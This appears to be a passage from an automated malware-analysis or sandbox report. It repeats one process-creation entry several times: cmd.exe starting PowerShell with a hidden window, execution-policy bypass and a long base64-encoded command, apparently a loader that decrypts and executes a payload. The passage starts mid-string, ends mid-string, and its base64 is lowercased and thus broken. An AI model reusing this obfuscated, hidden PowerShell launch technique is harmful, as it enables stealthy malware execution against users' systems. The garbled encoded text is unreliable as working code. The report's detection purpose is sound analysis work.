ujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk